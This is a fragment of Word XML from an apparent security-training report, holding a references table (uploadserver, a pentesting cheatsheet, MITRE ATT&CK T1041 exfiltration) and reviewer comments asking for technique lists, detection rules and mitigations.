      <w:commentRangeEnd w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="67"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidTr="001B4A08" w14:paraId="2EA84348" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="38BA6CF9" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="62F3664B" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00D51E26" w:rsidTr="001B4A08" w14:paraId="4C406D61" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="007134C9" w:rsidR="00D51E26" w:rsidP="001B4A08" w:rsidRDefault="00D51E26" w14:paraId="09C5910C" w14:textId="136914EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
              </w:rPr>
              <w:t>uploadserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D51E26" w:rsidR="00D51E26" w:rsidP="001B4A08" w:rsidRDefault="00D51E26" w14:paraId="7B5A24BD" w14:textId="784407DA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId68">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://pypi.org/project/uploadserver/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidTr="001B4A08" w14:paraId="66B366BE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="000F2369" w14:paraId="0829FA8D" w14:textId="7476F7E5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Pentesting Cheatsheets | Red Team Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B75F40" w14:paraId="4D7D9B16" w14:textId="3209143D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" w:anchor="uploading-posting-files-through-www-upload-forms" r:id="rId69">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets#uploading-posting-files-through-www-upload-forms</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="007463D5" w:rsidTr="001B4A08" w14:paraId="667905A3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="007463D5" w:rsidP="007463D5" w:rsidRDefault="007463D5" w14:paraId="0B79795E" w14:textId="3FCA6551">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="007463D5" w:rsidP="007463D5" w:rsidRDefault="00132BB0" w14:paraId="4E31C5AB" w14:textId="30EA85BC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId70">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1041/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00326ED4" w:rsidP="2BFA4357" w:rsidRDefault="00326ED4" w14:paraId="4BDA3A39" w14:textId="16182AEA">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="240C871B" w:rsidP="2BFA4357" w:rsidRDefault="240C871B" w14:paraId="27F4ED4E" w14:textId="59578AB4">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="240C871B" w:rsidSect="001D70A9">
      <w:footerReference w:type="default" r:id="rId71"/>
      <w:endnotePr>
        <w:numFmt w:val="decimal"/>
      </w:endnotePr>
      <w:pgSz w:w="11909" w:h="16834" w:orient="portrait"/>
      <w:pgMar w:top="864" w:right="1277" w:bottom="792" w:left="1440" w:header="709" w:footer="709" w:gutter="0"/>
      <w:cols w:space="709"/>
      <w:noEndnote/>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 w:author="Author" w:id="5">
    <w:p w:rsidR="00CB4373" w:rsidP="00CB4373" w:rsidRDefault="00CB4373" w14:paraId="744F3463" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Do have some document updates so that we know the report has gone through review amongst your own teammates.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="6">
    <w:p w:rsidR="00CB4373" w:rsidP="00CB4373" w:rsidRDefault="00CB4373" w14:paraId="1D99AF4E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Ensure to update this table of contents before you PDF generate the report.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="9">
    <w:p w:rsidR="00CB4373" w:rsidP="00CB4373" w:rsidRDefault="00CB4373" w14:paraId="2BE70832" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Ensure to fill this table up.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="14">
    <w:p w:rsidR="00D01BC9" w:rsidP="00D01BC9" w:rsidRDefault="00D01BC9" w14:paraId="28F4AC1E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="16">
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="198BCCD0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="18">
    <w:p w:rsidR="00D01BC9" w:rsidP="00D01BC9" w:rsidRDefault="00D01BC9" w14:paraId="4D7BD5DC" w14:textId="57BEDCEA">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="20">
    <w:p w:rsidR="00D01BC9" w:rsidP="00D01BC9" w:rsidRDefault="00D01BC9" w14:paraId="22C84665" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="22">
    <w:p w:rsidR="008B75AA" w:rsidP="008B75AA" w:rsidRDefault="008B75AA" w14:paraId="784152A0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="24">
    <w:p w:rsidR="00D01BC9" w:rsidP="00D01BC9" w:rsidRDefault="00D01BC9" w14:paraId="7D0BBE54" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="27">
    <w:p w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="166B9A61" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="29">
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="087A3724" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="31">
    <w:p w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="390E2845" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="33">
    <w:p w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="6F2BBF46" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="35">
    <w:p w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="7C55C2F5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="37">
    <w:p w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="01252BD1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="40">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="6D1C683B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="42">
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="6F2DA8AF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="44">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="75D7806D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="49">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="6766C7DC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="54">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="5737B409" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="57">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="75DE2BA1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>List out depicted technique(s) based on this one attack (can be more than 1 technique by the way)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="59">
    <w:p w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="4C222807" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Document the steps taken for the technique demonstrated.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="61">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="673CAA8F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Detection rules (either Wazuh or IDS, or even both). And do a short explanation what does each detection rule do along with the relevance of how it helps to detect the attack.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="63">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="1D681F85" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Actions to be performed by the analyst after the incident has occurred.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="65">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="3E8DF68D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Long term security controls to mitigate (or even prevent) attacks if possible, moving forward.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="A" w:author="Author" w:id="67">
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="673852C4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>References used for the writeup (can be links to the MITRE ATT&amp;CK techniques)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4F3463" w15:done="0"/>
  <w15:commentEx w15:paraId="1D99AF4E" w15:done="1"/>
  <w15:commentEx w15:paraId="2BE70832" w15:done="1"/>
  <w15:commentEx w15:paraId="28F4AC1E" w15:done="1"/>
  <w15:commentEx w15:paraId="198BCCD0" w15:done="1"/>
  <w15:commentEx w15:paraId="4D7BD5DC" w15:done="1"/>
  <w15:commentEx w15:paraId="22C84665" w15:done="1"/>
  <w15:commentEx w15:paraId="784152A0" w15:done="1"/>
  <w15:commentEx w15:paraId="7D0BBE54" w15:done="1"/>
  <w15:commentEx w15:paraId="166B9A61" w15:done="1"/>
  <w15:commentEx w15:paraId="087A3724" w15:done="1"/>
  <w15:commentEx w15:paraId="390E2845" w15:done="1"/>
  <w15:commentEx w15:paraId="6F2BBF46" w15:done="1"/>
  <w15:commentEx w15:paraId="7C55C2F5" w15:done="1"/>
  <w15:commentEx w15:paraId="01252BD1" w15:done="1"/>
  <w15:commentEx w15:paraId="6D1C683B" w15:done="1"/>
  <w15:commentEx w15:paraId="6F2DA8AF" w15:done="1"/>
  <w15:commentEx w15:paraId="75D7806D" w15:done="1"/>
  <w15:commentEx w15:paraId="6766C7DC" w15:done="1"/>
  <w15:commentEx w15:paraId="5737B409" w15:done="1"/>
  <w15:commentEx w15:paraId="75DE2BA1" w15:done="1"/>
  <w15:commentEx w15:paraId="4C222807" w15:done="1"/>
  <w15:commentEx w15:paraId="673CAA8F" w15:done="1"/>
  <w15:commentEx w15:paraId="1D681F85" w15:done="1"/>
  <w15:commentEx w15:paraId="3E8DF68D" w15:done="1"/>
  <w15:commentEx w15:paraId="673852C4"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4F3463" w16cid:durableId="128AFC0D"/>
  <w16cid:commentId w16cid:paraId="1D99AF4E" w16cid:durableId="648F370A"/>
  <w16cid:commentId w16cid:paraId="2BE70832" w16cid:durableId="63EAA8EF"/>
  <w16cid:commentId w16cid:paraId="28F4AC1E" w16cid:durableId="51C93428"/>
  <w16cid:commentId w16cid:paraId="198BCCD0" w16cid:durableId="57D3F781"/>
  <w16cid:commentId w16cid:paraId="4D7BD5DC" w16cid:durableId="45F1441B"/>
  <w16cid:commentId w16cid:paraId="22C84665" w16cid:durableId="1C25F225"/>
  <w16cid:commentId w16cid:paraId="784152A0" w16cid:durableId="44BFE053"/>
  <w16cid:commentId w16cid:paraId="7D0BBE54" w16cid:durableId="006EEC90"/>
  <w16cid:commentId w16cid:paraId="166B9A61" w16cid:durableId="058A5F7F"/>
  <w16cid:commentId w16cid:paraId="087A3724" w16cid:durableId="7D09508D"/>
  <w16cid:commentId w16cid:paraId="390E2845" w16cid:durableId="6F4E1536"/>
  <w16cid:commentId w16cid:paraId="6F2BBF46" w16cid:durableId="22BCC624"/>
  <w16cid:commentId w16cid:paraId="7C55C2F5" w16cid:durableId="69507592"/>
  <w16cid:commentId w16cid:paraId="01252BD1" w16cid:durableId="00D96676"/>
  <w16cid:commentId w16cid:paraId="6D1C683B" w16cid:durableId="4D9D3F37"/>
  <w16cid:commentId w16cid:paraId="6F2DA8AF" w16cid:durableId="41DACEDA"/>
  <w16cid:commentId w16cid:paraId="75D7806D" w16cid:durableId="73C1CB08"/>
  <w16cid:commentId w16cid:paraId="6766C7DC" w16cid:durableId="5EFB4016"/>
  <w16cid:commentId w16cid:paraId="5737B409" w16cid:durableId="03A2F0F5"/>
  <w16cid:commentId w16cid:paraId="75DE2BA1" w16cid:durableId="419E5C2B"/>
  <w16cid:commentId w16cid:paraId="4C222807" w16cid:durableId="23AE1DAA"/>
  <w16cid:commentId w16cid:paraId="673CAA8F" w16cid:durableId="38A0331A"/>
  <w16cid:commentId w16cid:paraId="1D681F85" w16cid:durableId="2C882FFA"/>
  <w16cid:commentId w16cid:paraId="3E8DF68D" w16cid:durableId="571BC517"/>
  <w16cid:commentId w16cid:paraId="673852C4" w16cid:durableId="120DED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2010F" w:rsidRDefault="0092010F" w14:paraId="7B4CE2DA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="20" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0092010F" w:rsidRDefault="0092010F" w14:paraId="6F950B19" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="0092010F" w:rsidRDefault="0092010F" w14:paraId="41E05F6A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>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okman Old Style">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w:altName w:val="Book Antiqua"/>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AR PL UMing HK">
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="FreeSan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Yu Mincho">
    <w:altName w:val="Yu Gothic"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>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D0F8B" w:rsidR="00C07D0E" w:rsidP="008905B7" w:rsidRDefault="00C07D0E" w14:paraId="0114C637" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun"/>
        <w:sz w:val="16"/>
        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun"/>
        <w:sz w:val="16"/>
        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun"/>
        <w:sz w:val="16"/>
